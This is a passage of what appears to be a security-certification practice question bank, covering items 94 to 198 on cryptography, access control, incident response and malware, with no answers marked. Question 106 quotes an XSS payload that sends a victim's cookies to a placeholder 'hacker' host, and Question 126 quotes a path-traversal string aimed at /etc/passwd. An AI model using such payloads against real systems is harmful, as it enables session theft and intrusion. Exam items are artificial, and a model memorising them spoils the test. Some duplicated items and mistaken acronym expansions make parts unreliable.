A security architect has convened a meeting to discuss an organization's key management policy. The organization has a reliable internal key management system, and some argue that it would be best to manage the cryptographic keys internally as opposed to using a solution from a third party. The company should use:
Answer
  • the current internal key management system.
  • a third-party key management system that will reduce operating costs.
  • risk benefits analysis results to make a determination.
  • a software solution including secure key escrow capabilities

Question 94

Question
After a recent internal breach, a company decided to regenerate and reissue all certificates used in the transmission of confidential information. The company places the greatest importance on confidentiality and non-repudiation, and decided to generate dual key pairs for each client. Which of the following BEST describes how the company will use these certificates?
Answer
  • One key pair will be used for encryption and decryption. The other will be used to digitally sign the data.
  • One key pair will be used for encryption. The other key pair will provide extended validation.
  • Data will be encrypted once by each key, doubling the confidentiality and non-repudiation strength.
  • One key pair will be used for internal communication, and the other will be used for external communication.

Question 95

Question
A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO)
Answer
  • Time-of-day restrictions
  • Password complexity
  • Location-based authentication
  • Group-based access control
  • Standard naming convention

Question 96

Question
A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees?
Answer
  • WPS (WiFi Protected Setup)
  • 802.1x
  • WPA2-PSK (WiFi Protected Access 2 - Preshared Key)
  • TKIP (Temporal Key Integrity Protocol)

Question 97

Question
A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO).
Answer
  • Implement a reverse proxy.
  • Implement an email DLP (Data Loss Prevention).
  • Implement a spam filter.
  • Implement a host-based firewall.
  • Implement a HIDS (Host-based Intrusion Detection System).

Question 98

Question
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration?
Answer
  • Setting up a server
  • Configuring federation between authentication servers
  • Enabling TOTP (Time-based One-time Password)
  • Deploying certificates to endpoint devices

Question 99

Question
Ann is the IS manager for several new systems in which the classification of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification?
Answer
  • Steward
  • Custodian
  • User
  • Owner

Question 100

Question
A systems administrator wants to generate a self-signed certificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server?
Answer
  • Provide the private key to a public CA.
  • Provide the public key to the internal CA.
  • Provide the public key to a public CA.
  • Provide the private key to the internal CA.
  • Provide the public/private key pair to the internal CA.
  • Provide the public/private key pair to a public CA.

Question 101

Question
A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices?
Answer
  • Install a corporately monitored mobile antivirus on the devices.
  • Prevent the installation of applications from a third-party application store.
  • Build a custom ROM than can prevent jailbreaking.
  • Require applications to be digitally signed.

Question 102

Question
Which of the following describes the key difference between vishing and phishing attacks?
Answer
  • Phishing is used by attackers to steal a person's identity.
  • Vishing attacks require some knowledge of the target of attack.
  • Vishing attacks are accomplished using telephony services.
  • Phishing is a category of social engineering attack.

Question 103

Question
Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?
Answer
  • Passive scan
  • Aggressive scan
  • Credentialed scan
  • Intrusive scan

Question 104

Question
A hacker has a packet capture that contains: ....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2.. ...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2.. ....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2.. Which of the following tools will the hacker use against this type of capture?
Answer
  • Password cracker
  • Vulnerability scanner
  • DLP scanner
  • Fuzzer

Question 105

Question
A user downloads and installs an MP3 converter, and runs the application. Upon running the application, the antivirus detects a new port in a listening state. Which of the following has the user MOST likely executed?
Answer
  • RAT
  • Worm
  • Ransomware
  • Bot

Question 106

Question
An attacker exploited a vulnerability on a mail server using the code below. <HTML><body onload=document.location.replace ('http://hacker/post.asp?victim&message =" + document.cookie + "<br>" + "URL:" +"document.location) ; /> </body> </HTML> Which of the following BEST explains what the attacker is doing?
Answer
  • The attacker is replacing a cookie.
  • The attacker is stealing a document.
  • The attacker is replacing a document.
  • The attacker is deleting a cookie.

Question 107

Question
A security analyst is securing smartphones and laptops for a highly mobile workforce. Priorities include: - Remote wipe capabilities - Geolocation services - Patch management and reporting - Mandatory screen locks - Ability to require passcodes and pins - Ability to require encryption Which of the following would BEST meet these requirements?
Answer
  • Implementing MDM software
  • Deploying relevant group policies to the device
  • Installing full device encryption
  • Removing administrative rights to the devices

Question 108

Question
A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrator credentials. Which of the following account types is the systems administrator using?
Answer
  • Guest account
  • Service account
  • User account
  • Local account

Question 109

Question
An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication?
Answer
  • Proximity card, fingerprint scanner, PIN
  • Fingerprint scanner, voice recognition, proximity card
  • Smart card, user PKI certificate, privileged user certificate
  • Voice recognition, smart card, proximity card

Question 110

Question
Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices?
Answer
  • Shibboleth
  • RADIUS federation
  • SAML
  • OAuth
  • OpenID connect

Question 111

Question
A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: *All access must be correlated to a user account. *All user accounts must be assigned to a single individual. *User access to the PHI data must be recorded. *Anomalies in PHI data access must be reported. *Logs and records cannot be deleted or modified. Which of the following should the administrator implement to meet the above requirements? (Select THREE).
Answer
  • Eliminate shared accounts.
  • Create a standard naming convention for accounts
  • Implement usage auditing and review.
  • Enable account lockout thresholds.
  • Copy logs in real time to a secured WORM (Write Once Read Many) device.
  • Implement time-of-day restrictions.
  • Perform regular permission audits and reviews.

Question 112

Question
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?
Answer
  • Competitor
  • Hacktivist
  • Insider
  • Organized crime

Question 113

Question
Which of the following differentiates a collision attack from a rainbow table attack?
Answer
  • A rainbow table attack performs a hash lookup.
  • A rainbow table attack uses the hash as a password.
  • In a collision attack, the hash and the input data are equivalent.
  • In a collision attack, the same input results in different hashes.

Question 114

Question
A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the MOST likely cause of the decreased disk space?
Answer
  • Misconfigured devices.
  • Logs and event anomalies.
  • Authentication issues.
  • Unauthorized software.

Question 115

Question
Which of the following is used to validate the integrity of data?
Answer
  • CBC (Cipher Block Chaining)
  • Blowfish
  • MD5 (Message Digest 5)
  • RSA (Rivest, Shamir, & Adleman)

Question 116

Question
When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following "----- as a service" model that would be BEST suited for this goal?
Answer
  • Infrastructure
  • Platform
  • Software
  • Virtualization

Question 117

Question
A company was recently audited by a third party. The audit revealed the company's network devices were transferring files in the clear. Which of the following protocols should the company use to transfer files?
Answer
  • HTTPS (Hypertext Terminal Protocol Secure)
  • LDAPS (Lightweight Directory Access Protocol Secure)
  • SCP (Secure Copy)
  • SNMPv3 (Simple Network Management Protocol ver 3)

Question 118

Question
A cybersecurity analyst is looking into the payload of a random packet capture file that was selected for analysis. The analyst notices that an internal host had a socket established with another internal host over a non-standard port. Upon investigation, the origin host that initiated the socket shows this output: usera@host>history mkdir /local/usr/bin/somedirectory nc -1 192.168.5.1 -p 9856 ping -c 30 8.8.8.8 -a 600 rm /etc/dir2/somefile rm -rm /etc/dir2/ traceroute 8.8.8.8 pakill pid 9487 usera@host> Given the above output, which of the following commands would have established the questionable socket?
Answer
  • traceroute 8.8.8.8
  • ping -1 30 8.8.8.8 -a 600
  • nc -1 192.168.5.1 -p 9856
  • pskill pid 9487

Question 119

Question
To help prevent one job role from having sufficient access to create, modify, and approve payroll data, which of the following practices should be employed?
Answer
  • Least privilege
  • Job rotation
  • Background checks
  • Separation of duties

Question 120

Question
The help desk received a call after hours from an employee who was attempting to log into the payroll server remotely. When the help desk returned the call the next morning, the employee was able to log into the server remotely without incident. However, the incident occurred again the next evening. Which of the following BEST describes the cause of the issue?
Answer
  • The password expired on the account and needed to be reset.
  • The employee does not have the rights needed to access the database remotely.
  • Time-of-day restrictions prevented the account from logging in.
  • The employee's account was locked out and needed to be unlocked.

Question 121

Question
A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFI-enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor?
Answer
  • Outdated antivirus
  • Wi-Fi signal strength
  • Social engineering
  • Default configuration

Question 122

Question
Which of the following refers to the mean time used to restore a system to its operational state?
Answer
  • MTBF (Mean Time Between Failures)
  • MTTR ( Mean Time to Recover)
  • RTO (Recovery Time Objective)
  • RPO (Recovery Point Objective)

Question 123

Question
A Chief Information Officer (CIO) recently saw on the news that a significant security flaws exists with a specific version of a technology the company uses to support many critical application. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?
Answer
  • Penetration test
  • Vulnerability scan
  • Active reconnaissance
  • Patching assessment report

Question 124

Question
An organization is expanding its network team. Currently, it has local accounts on all network devices, but with growth, it wants to move to centrally managed authentication. Which of the following are the BEST solutions for the organization? (Sect TWO)
Answer
  • TACACS+ (Terminal Access Controller Access Control System Plus)
  • CHAP (Challenge Handshake Authentication Protocol)
  • LDAP (Lightweight Directory Access Protocol)
  • RADIUS (Remote Authentication Dial-in User Server)
  • MSCHAPv2 (Microsoft Challenge Handshake Authentication Protocol ver 2)

Question 125

Question
Which of the following would provide additional security by adding another factor to a smart card?
Answer
  • Token
  • Proximity badge
  • Physical key
  • PIN

Question 126

Question
A security analyst receives an alert from a WAF (Web Application Firewall) with the following payload: var data = "<test test test> ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this?
Answer
  • Cross-site request forgery
  • Buffer overflow
  • SQL injection
  • JavaScript data insertion
  • Firewall evasion script

Question 127

Question
Which of the following uses precomputed hashes to guess passwords?
Answer
  • lptables
  • NAT tables
  • Rainbow tables
  • ARP tables

Question 128

Question
A systems administrator wants to provide balance between the security of a wireless network and usability. The administrator is concerned with wireless encryption compatibility of older devices used by some employees. Which of the following would provide strong security backward compatibility when accessing the wireless network?
Answer
  • Open wireless network and SSL (Secure Socket Layer) VPN (Virtual Private Network)
  • WPA (WiFi Protected Access) using a preshared key
  • WPA2 (WiFi Protected Access 2) using a RADIUS (Remote Authentication Dial-in User Server) back-end for 802.1x authentication
  • WEP (Wired Equivalent Privacy) with 40-bit key

Question 129

Question
In determining when it may be necessary to perform a credentialed scan against a system instead of a non-credentialed scan, which of the following requirements is MOST likely to influence its decisions?
Answer
  • The scanner must be able to enumerate the host OS of devices scanner
  • The scanner must be able to footprint the network
  • The scanner must be able to check for open ports with listening services
  • The scanner must be able to audit file system permissions

Question 130

Question
A security administrator receives an alert from a third-party vendor that indicates a certificate that was installed in the browser has been hijacked at the root of a small public CA. The security administrator knows there are at least four different browsers in use on more than a thousand computers in the domain worldwide. Which of the following solutions would be BEST for the security administrator to implement to most efficiently assist with this issue?
Answer
  • SSL (Secure Socket Layer)
  • CRL (Certificate Revocation List)
  • PKI (Public Key Infrastructure)
  • ACL (Acces Control List)

Question 131

Question
After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: c:\Windows\system32>netstat -nab Active Connections Pronto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0 RpcSs [svchoat.exe] TCP 0.0.0.0:445 0.0.0.0 [svchost.exe] TCP 192.168.1.10:5000 10.37.213.20 winserver.exe UDP 192.168.1.10:1900 *.* SSDPSVR Based on the above information, which of the following types of malware was installed on the user's computer?
Answer
  • RAT (Remote Access Trojan)
  • Keylogger
  • Spyware
  • Worm
  • Bot

Question 132

Question
A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO)
Answer
  • Install an additional firewall
  • Implement a redundant email server
  • Block access to personal email on corporate systems
  • Update the X.509 certificates on the corporate email server
  • Update corporate policy to prohibit access to social media websites
  • Review access violation on the file server

Question 133

Question
A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact?
Answer
  • Launch an investigation to identify the attacking host
  • Initiate the incident response plan
  • Review lessons learned captured in the process
  • Remove malware and restore the system to normal operation

Question 134

Question
Joe, a salesman, was assigned to a new project that requires him to travel to a client site. While waiting for a flight, Joe, decides to connect to the airport wireless network without connecting to a VPN, and the sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation, the company learns Joe's emails were intercepted. Which of the following MOST likely caused the data breach?
Answer
  • Policy violation
  • Social engineering
  • Insider threat
  • Zero-day attack

Question 135

Question
A company wants to ensure confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following method should the technician use?
Answer
  • Shredding
  • Wiping
  • Low-level formatting
  • Repartitioning
  • Overwriting

Question 136

Question
An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts: - The breach is currently indicated on six user PCs - One service account is potentially compromised - Executive management has been notified In which of the following phases of the IRP is the manager currently working?
Answer
  • Recovery
  • Eradication
  • Containment
  • Identification

Question 137

Question
A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement?
Answer
  • Hot site
  • Warm site
  • Cold site
  • Cloud-based site

Question 138

Question
User from two organizations, each with its own PKI, need to begin working together on a joint project. Which of the following would allow the users of the separate PKIs to work together without connection errors?
Answer
  • Trust model
  • Stapling
  • Intermediate CA
  • Key escrow

Question 139

Question
A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk?
Answer
  • Enable CHAP (Challenge Handshake Authentication Protocol)
  • Disable NTLM (New Technology LAN Manager)
  • Enable Kerberos
  • Disable PAP (Password Authentication Protocol)

Question 140

Question
A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report?
Answer
  • Vulnerability scanner
  • Protocol analyzer
  • Network mapper
  • Web inspector

Question 141

Question
A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO (Annualized Rate of Occurrence) value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500 (Single Loss Expectancy). Which of the following SLE values warrants a recommendation against purchasing the malware protection?
Answer
  • $500
  • $1000
  • $2000
  • $2500

Question 142

Question
The computer resource center issue smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the managers installed?
Answer
  • Download manager
  • Content manager
  • Segmentation manager
  • Application manager

Question 143

Question
A systems administrator wants to provide for and enforce wireless access accountability during events where external speakers are invited to make presentations to a mixed audience of employees and non-employees. Which of the following should the administrator implement?
Answer
  • Shared accounts
  • Preshared password
  • Least privilege
  • Sponsored guest

Question 144

Question
A recent internal audit is forcing a company to review each internal business unit's VMs because the cluster they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exist?
Answer
  • Buffer overflow
  • End-of-life systems
  • System sprawl
  • Weak configuration

Question 145

Question
Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data?
Answer
  • Symmetric algorithm
  • Hash function
  • Digital signature
  • Obfuscation

Question 146

Question
A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel?
Answer
  • Tunnel mode IPSec (Internet Protocol Security)
  • Transport mode VPN (Virtual Private Network) IPSec
  • L2TP (Layer 2 Tunneling Protocol)
  • SSL (Secure Socket Layer) VPN (Virtual Private Network)

Question 147

Question
An application was recently compromised after some malformed data came in via web form. Which of the following would MOST likely have prevented this?
Answer
  • Input validation
  • Proxy server
  • Stress testing
  • Encoding

Question 148

Question
While working on an incident, Joe, a technician, finished restoring the OS and applications on a workstation from the original media. Joe is about to begin copying the user's files back onto the hard drive. Which of the following incident response steps is Joe working on now?
Answer
  • Recovery
  • Eradication
  • Containment
  • Identification

Question 149

Question
A systems administrator found a suspicious file in the root of the file system. The file contains URLs, usernames, passwords, and text from other documents being edited on the system. Which of the following types of malware would generate such a file?
Answer
  • Keylogger
  • Rootkit
  • Bot
  • RAT

Question 150

Question
A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exfiltrated through an active connection. Which of the following is the NEXT step the team should take?
Answer
  • Identify the source of the active connection
  • Perform eradication of active connection and recover
  • Perform containment procedure by disconnecting the server
  • Format the server and restore its initial configuration

Question 151

Question
A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?
Answer
  • Banner grabbing
  • Port scanning
  • Packet sniffing
  • Virus scanning

Question 152

Question
A company has a data classification system with definitions for "Private" and "Public". the company's security policy outlines how data should be protected based on type. The company recently added data type "Proprietary". Which of the following is the MOST likely reason the company added this data type?
Answer
  • Reduced cost
  • More searchable
  • Better data classification
  • Expanded authority of the privacy officer

Question 153

Question
A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure?
Answer
  • Accounting
  • Authorization
  • Authentication
  • Identification

Question 154

Question
A security administrator installed a new network scanner that identifies new host systems on the network. Which of the following did the security administrator install?
Answer
  • Vulnerability scanner
  • Network-based IDS
  • Rogue system detection
  • Configuration compliance scanner

Question 155

Question
A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe?
Answer
  • Transference
  • Avoidance
  • Mitigation
  • Acceptance

Question 156

Question
An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data. Employee Job Function Audit Finding Ann Sales Manager *Access to confidential payroll shares *Access to payroll processing program *Access to marketing shares Jeff Marketing Director *Access to human resources annual review folder *Access to shared human resources mailbox John Sales Manager *Active account *Access to human resources annual review folder *Access to confidential payroll shares Which of the following would be the BEST method to prevent similar audit finding in the future?
Answer
  • Implement separation of duties for the payroll department
  • Implement a DLP (Data Loss Prevention) solution on the payroll and human resources reviews
  • Implement a rule-based access controls on the human resources server
  • Implement regular permission auditing and reviews

Question 157

Question
A technician is investigating a potentially compromised device with the following symptoms: Browser slowness Frequent browser crashes Hourglass stuck New search toolbar Increased memory consumption Which of the following types of malware has infected the system?
Answer
  • Man-in-the-browser
  • Spoofer
  • Spyware
  • Adware

Question 158

Question
A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application?
Answer
  • Hashing
  • Key exchange
  • Encryption
  • Obfuscation

Question 159

Question
When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO)
Answer
  • MAC address table
  • Retina scan
  • Fingerprint scan
  • Two-factor authentication
  • Password string

Question 160

Question
A company has two wireless networks utilizing captive portals. Some employees report getting a trust error in their browsers when connecting to one of the networks. Both captive portals are using the same server certificate for authentication, but the analyst notices the following differences between the two certificate details: Certificate 1 Certificate Path: Geotrust Global CA *company.com Certificate 2 Certificate Path: *company.com Which of the following would resolve the problem?
Answer
  • Use a wildcard certificate
  • Use certificate chaining
  • Use a trust model
  • Use an extended validation certificate

Question 161

Question
An organization's employees currently use three different sets of credentials to access multiple internal resources. Management wants to make this process less complex. Which of the following would be the BEST option to meet this goal?
Answer
  • Transitive trust
  • Single sign-on
  • Federation
  • Secure token

Question 162

Question
An external attacker can modify the ARP cache of an internal computer. Which of the following types of attacks is described?
Answer
  • Replay
  • Spoofing
  • DNS poisoning
  • Client-side attack

Question 163

Question
A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process?
Answer
  • Restore lost data from a backup.
  • Wipe the system.
  • Document the lessons learned.
  • Determine the scope of the impact.

Question 164

Question
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage?
Answer
  • Non-intrusive credentialed scan
  • Non-intrusive non-credentialed scan
  • Intrusive credentialed scan
  • Intrusive non-credentialed scan

Question 165

Question
A security analyst is hardening a WiFi infrastructure. The primary requirements are the following: The infrastructure must allow staff to authenticate using the most secure method. The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet. Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure?
Answer
  • Configure a captive portal for guests and WPS for staff.
  • Configure a captive portal for staff and WPA for guests.
  • Configure a captive portal for staff and WEP for guests.
  • Configure a captive portal for guest and WPA2 Enterprise for staff.

Question 166

Question
A security administrator is trying to eradicate a worm, which is spreading throughout the organization, using an old remote vulnerability in the SMB protocol. The worm uses Nmap to identify target hosts within the company. The administrator wants to implement a solution that will eradicate the current worm and any future attacks that may be using zero-day vulnerabilities. Which of the following would BEST meet the requirements when implemented?
Answer
  • Host-based firewall
  • Enterprise patch management system
  • Network based intrusion prevention system
  • Application blacklisting
  • File integrity checking

Question 167

Question
Which of the following is a deployment concept that can be used to ensure only the required OS access is exposed to software applications?
Answer
  • Staging environment
  • Sandboxing
  • Secure baseline
  • Trusted OS

Question 168

Question
Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test?
Answer
  • Black box
  • Gray box
  • Credentialed
  • White box

Question 169

Question
Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?
Answer
  • Competitors
  • Insiders
  • Hacktivists
  • Script kiddies

Question 170

Question
A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts?
Answer
  • Employ time-of-day restrictions.
  • Employ password complexity.
  • Employ a random key generator strategy.
  • Employ an account expiration strategy.
  • Employ a lockout policy.

Question 171

Question
Which of the following locations contain the MOST volatile data?
Answer
  • SSD (Solid State Drive)
  • Paging file
  • RAM (Random Access Memory)
  • Cache memory

Question 172

Question
Ann, a customer, is reporting that several important files are missing from her workstation. She recently received communication from an unknown party who is requesting funds to restore the files. Which of the following attacks has occurred?
Answer
  • Ransomware
  • Keylogger
  • Buffer overflow
  • Rootkit

Question 173

Question
Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement?
Answer
  • Role-based access control
  • Honeypot
  • Rule-based access controls
  • Password cracker

Question 174

Question
Joe, a user, has been trying to send Ann, a different user, an encrypted document via email. Ann has not received the attachment but is able to receive the header information. Which of the following is MOST likely preventing Ann from receiving the encrypted file?
Answer
  • Unencrypted credentials
  • Authentication issues
  • Weak cipher suite
  • Permission issues

Question 175

Question
A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control?
Answer
  • Discretionary access control
  • Mandatory access controls
  • Role-based access control
  • Rule-based access control

Question 176

Question
An analyst is using a vulnerability scanner to look for common security misconfigurations on devices. Which of the following might be identified by the scanner? (Select TWO).
Answer
  • The firewall is disabled on workstations.
  • SSH is enable on servers.
  • Browser homepages have not been customized.
  • Default administrator credentials exist on networking hardware.
  • The OS is only set to check for updates once a day.

Question 177

Question
A security analyst is reviewing patches on servers. One of the servers is reporting the following error message in the WSUS (Windows Server Update Services) management console: The computer has not reported status in 30 days. Given this scenario, which of the following statements BEST represents the issue with the output above?
Answer
  • The computer in question has not pulled the latest ACL policies for the firewall.
  • The computer in question has not pulled the latest GPO policies from the management server.
  • The computer in question has not pulled the latest antivirus definitions from the antivirus program.
  • The computer in question has not pulled the latest application software updates.

Question 178

Question
Two users must encrypt and transmit large amount of data between them. Which of the following should they use to encrypt and transmit the data?
Answer
  • Symmetric algorithm
  • Hash function
  • Digital signature
  • Obfuscation

Question 179

Question
A bank is experiencing a DoS attack against an application designed to handle 500IP-based sessions. In addition, the perimeter router can only handle 1Gbps of traffic. Which of the following should be implemented to prevent a DoS attacks in the future?
Answer
  • Deploy multiple web servers and implement a load balancer
  • Increase the capacity of the perimeter router to 10 Gbps
  • Install a firewall at the network to prevent all attacks
  • Use redundancy across all network devices and services

Question 180

Question
A malicious system continuously sends an extremely large number of SYN packets to a server. Which of the following BEST describes the resulting effect?
Answer
  • The server will be unable to connect to server clients due to lack of bandwidth
  • The server's firewall will be unable to effectively filter traffic due to the amount of data transmitted
  • The server will crash when trying to reassemble all the fragmented packets
  • The server will exhaust its memory maintaining half-open connections

Question 181

Question
Which of the following is the proper order for logging a user into a system from the first step to the last step?
Answer
  • Identification, authentication, authorization
  • Identification, authorization, authentication
  • Authentication, identification, authorization
  • Authorization, identification, authentication

Question 182

Question
A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises?
Answer
  • Air gap
  • Infrared detection
  • Faraday cage
  • Protected distributions

Question 183

Question
A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing?
Answer
  • Phishing
  • Shoulder surfing
  • Impersonation
  • Dumpster diving

Question 184

Question
Confidential emails from an organization were posted to a website without the organization's knowledge. Upon investigation, it was determined that the emails were obtained from an internal actor who sniffed the emails in plain text. Which of the following protocols, if properly implemented, would have MOST likely prevented the emails from being sniffed? (Select TWO)
Answer
  • Secure IMAP (Internet Message Access Protocol)
  • DNSSEC (Domain Name System Security Extensions)
  • S/MIME (Secure/Multipurpose Internet Mail Extensions)
  • SMPTS (Simple Mail Transfer Protocol Secure)
  • HTTPS (Hypertext Terminal Protocol Secure)

Question 185

Question
A company wants to implement an access management solution that allows employees to use the same usernames and passwords for multiple applications without having to keep multiple credentials synchronized. Which of the following solutions would BEST meet these requirements? (Select TWO)
Answer
  • Multifactor authentication
  • SSO (Single sign-on)
  • Biometrics
  • PKI
  • Federation

Question 186

Question
An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate actions to take?
Answer
  • Flip the documents face down so no one knows these documents are PII sensitive
  • Shred the documents and let the owner print the new set
  • Retrieve the documents, label them with a PII cover sheet, and return them to the printer
  • Report to the human resources manager that their personnel are violating a privacy policy

Question 187

Question
Which of the following metrics are used to calculate the SLE (Single Loss Expectancy)? (Select TWO)
Answer
  • ROI (Return on Investment)
  • ARO (Annualized Rate of Occurence)
  • ALE (Annualized Loss Expectancy)
  • MTBF (Mean Time Between Failures)
  • MTTF (Mean Time to Failure)
  • TCO (Total Cost of Ownership)

Question 188

Question
An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager notified the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred?
Answer
  • Public
  • Private
  • PHI
  • PII

Question 189

Question
Which of the following is an asymmetric function that generates a new and separate key every time it runs?
Answer
  • RSA (Rivest, Shamir, & Adleman)
  • DSA (Digital Signature Algorithm)
  • DHE (Diffie-Hellman ephemeral mode))
  • HMAC (Hashed Message Authentication Code)
  • PBKDF2 (Password-based Key Derivation Function 2)

Question 190

Question
Which of the following would be considered multifactor authentication?
Answer
  • Hardware token and smart card
  • Voice recognition and retina scan
  • Strong password and fingerprint
  • PIN and security questions

Question 191

Question
Users report the following message appear when browsing to the company's secure site: This website cannot be trusted. Which of the following actions should a security analyst take to resolve these messages? (Select TWO)
Answer
  • Verify the certificate has not expired on the server
  • Ensure the certificate has a .pfx extension on the server
  • Update the root certificate into the client computer certificate store
  • Install the updated private key on the web server
  • Have users clear their browsing history and relaunch the session

Question 192

Question
Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations? (Select TWO)
Answer
  • Password expiration
  • Password length
  • Password complexity
  • Password history
  • Password lockout

Question 193

Question
A systems administrator has isolated an infected system from the network and terminated the malicious process from executing. Which of the following should the administrator do NEXT according to the incident response process?
Answer
  • Restore lost data from a backup.
  • Wipe the system.
  • Document the lessons learned.
  • Determine the scope of impact.

Question 194

Question
An active / passive configuration has an impact on:
Answer
  • Confidentiality
  • Integrity
  • Availability
  • Non-repudiation

Question 195

Question
Which of the following threat actors is MOST likely to steal a company's proprietary information to gain a market edge and reduce time to market?
Answer
  • Competitor
  • Hacktivist
  • Insider
  • Organized crime

Question 196

Question
A retail store recently deployed tablets for sales employees to use while assisting customers. Two of the tablets have already been lost or stolen. Which of the following would be the BEST way for the store to secure the tablets against future loss or theft?
Answer
  • Cable locks
  • Screen filters
  • Geotracking
  • Remote wipe

Question 197

Question
A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact?
Answer
  • Launch an investigation to identify the attacking host.
  • Initiate the incident response plan.
  • Review lessons learned captured in the process.
  • Remove malware and restore the system to normal operation.

Question 198

Question
A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which of the following is the FIRST step the forensic expert needs to take to protect the chain of custody?
Answer
  • Make a forensic copy.
  • Create a hash of the hard drive.
  • Recover hard drive data.
  • Update the evidence log.

Question 199

Question
